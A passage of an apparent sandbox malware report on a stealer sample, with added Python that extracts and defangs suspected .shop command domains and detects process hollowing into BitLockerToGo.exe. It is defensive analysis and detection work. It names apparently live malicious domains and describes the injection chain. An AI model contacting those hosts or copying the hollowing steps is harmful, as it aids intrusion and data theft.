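ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")
HOST_RE = re.compile(r"^(?=.{4,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24}$")
NOT_HOSTS = (".go", ".dll", ".exe", ".pdb")   # file-name suffixes that would pass HOST_RE

SAMPLE_DUMP = (
    b"\x00\x00covvercilverow.shop\x00surroundeocw.shop\x00abortinoiwiam.shop\x00"
    b"net/addrselect.go\x00github.com/saferwall/pe@v1.5.4/loadconfig.go\x00"
    b"%SystemRoot%\\system32\\mswsock.dll\x00\x00\x00"
    + "pianoswimen.shop".encode("utf-16-le") + b"\x00\x00"   # wide copy (assumed)
    + b"covvercilverow.shop\x00"                              # repeat: reported once
)


def extract_strings(buf: bytes):
    """Yield printable runs of at least 4 characters, ASCII first, then UTF-16LE."""
    for m in ASCII_RE.finditer(buf):
        yield m.group().decode("ascii")
    for m in WIDE_RE.finditer(buf):
        yield m.group().decode("utf-16-le")


def candidate_domains(buf: bytes, tlds=None) -> list:
    """Ordered, de-duplicated hostnames; tlds=("shop",) restricts to those TLDs."""
    found = []
    for s in extract_strings(buf):
        for tok in re.split(r"[^A-Za-z0-9.-]+", s):   # split paths/URLs into host-like tokens
            tok = tok.strip(".-").lower()
            if not HOST_RE.match(tok) or tok.endswith(NOT_HOSTS):
                continue
            if tlds is not None and tok.rsplit(".", 1)[1] not in tlds:
                continue
            if tok not in found:
                found.append(tok)
    return found


def defang(host: str) -> str:
    """Make the indicator safe to paste into tickets and chat."""
    return host.replace(".", "[.]")


if __name__ == "__main__":
    for h in candidate_domains(SAMPLE_DUMP, tlds=("shop",)):
        print(defang(h))
```

Without a TLD filter the pass also returns github.com from the embedded Go module path, which is why module and package paths are worth recognising before treating every hostname-shaped string in a Go binary as an indicator.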
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2960000
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2AA3008
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Users\user\Desktop\iq2HxA0SLw.exe VolumeInformation
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Desktop\iq2HxA0SLw.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
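The evasion section above is the injection chain in pieces: the parent spawns the signed Windows binary BitLockerToGo.exe (suspended, per the signature list), allocates an execute+write region in it at 0x2960000, writes data beginning with 4D5A ("MZ") to that same base, writes a second region, and the hollowed process then does the network and WMI work. Correlating these into one finding is what a detection pipeline has to do. The following is an added example, not Joe Sandbox logic: a stateful correlation over a constructed event log in a simplified "<source> <event>: <target> key: value ..." form modelled on the report lines. The "flags: suspended" field and the benign explorer.exe/notepad.exe lines are assumed for illustration; a hit requires, for one (source, target) pair with source != target, an execute+write allocation and an MZ-prefixed write at the same base.

```python
"""Correlate sandbox behaviour events into a "PE injected into a foreign
process" finding.

Added example, not Joe Sandbox logic. SAMPLE_LOG is a constructed event log
in a simplified form modelled on the report; the "flags: suspended" field
and the explorer.exe/notepad.exe lines are assumed for illustration.
"""
import re
from collections import defaultdict

SAMPLE_LOG = """\
iq2HxA0SLw.exe Process created: BitLockerToGo.exe flags: suspended
iq2HxA0SLw.exe Memory allocated: BitLockerToGo.exe base: 2960000 protect: page execute and read and write
iq2HxA0SLw.exe Memory written: BitLockerToGo.exe base: 2960000 value starts with: 4D5A
iq2HxA0SLw.exe Memory written: BitLockerToGo.exe base: 2AA3008
explorer.exe Memory allocated: notepad.exe base: 1F0000 protect: page read and write
explorer.exe Memory written: notepad.exe base: 1F0000 value starts with: 48656C6C
notepad.exe Memory allocated: notepad.exe base: 200000 protect: page execute and read and write
"""

LINE_RE = re.compile(
    r"^(?P<src>\S+) (?P<kind>Process created|Memory allocated|Memory written): (?P<dst>\S+)(?P<rest>.*)$")
KEYS = "base|protect|value starts with|flags"
KV_RE = re.compile(rf"(?P<k>{KEYS}): (?P<v>.+?)(?= (?:{KEYS}):|$)")   # lazy value up to the next key


def parse_event(line: str):
    """Return {'src', 'kind', 'dst', <key: value ...>} or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = {"src": m["src"], "kind": m["kind"], "dst": m["dst"]}
    ev.update((kv["k"], kv["v"]) for kv in KV_RE.finditer(m["rest"]))
    return ev


def _fresh():
    return {"suspended": False, "rwx": set(), "mz": set(), "writes": 0}


def detect_pe_injection(log: str) -> list:
    """Stateful correlation; one finding per (source, target) pair that injects a PE image."""
    state = defaultdict(_fresh)
    for line in log.splitlines():
        ev = parse_event(line)
        if ev is None or ev["src"] == ev["dst"]:
            continue                                  # self-modification is not foreign injection
        s = state[(ev["src"], ev["dst"])]
        if ev["kind"] == "Process created" and ev.get("flags") == "suspended":
            s["suspended"] = True
        elif ev["kind"] == "Memory allocated":
            prot = ev.get("protect", "")
            if "execute" in prot and "write" in prot:  # RWX region in a foreign process
                s["rwx"].add(int(ev["base"], 16))
        elif ev["kind"] == "Memory written":
            s["writes"] += 1
            if ev.get("value starts with", "").upper().startswith("4D5A"):
                s["mz"].add(int(ev["base"], 16))      # a PE header landed at this base
    findings = []
    for (src, dst), s in state.items():
        hit = s["rwx"] & s["mz"]                      # MZ written into an RWX allocation
        if hit:
            findings.append({"source": src, "target": dst, "base": min(hit),
                             "suspended": s["suspended"], "writes": s["writes"]})
    return findings


if __name__ == "__main__":
    for f in detect_pe_injection(SAMPLE_LOG):
        print(f"PE injection: {f['source']} -> {f['target']} @ {f['base']:#x} "
              f"(suspended={f['suspended']}, writes={f['writes']})")
```

The explorer.exe write into notepad.exe does not fire because the region is not executable and the payload is not a PE header, and notepad.exe allocating RWX in itself is skipped as self-modification; keying on the combination rather than on any single event is what keeps this signature quiet on JIT runtimes and debuggers.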

Stealing of Sensitive Information

Source: Yara match File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: iq2HxA0SLw.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000000.1418035635.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1863283759.00007FF6A99C7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: iq2HxA0SLw.exe PID: 2992, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR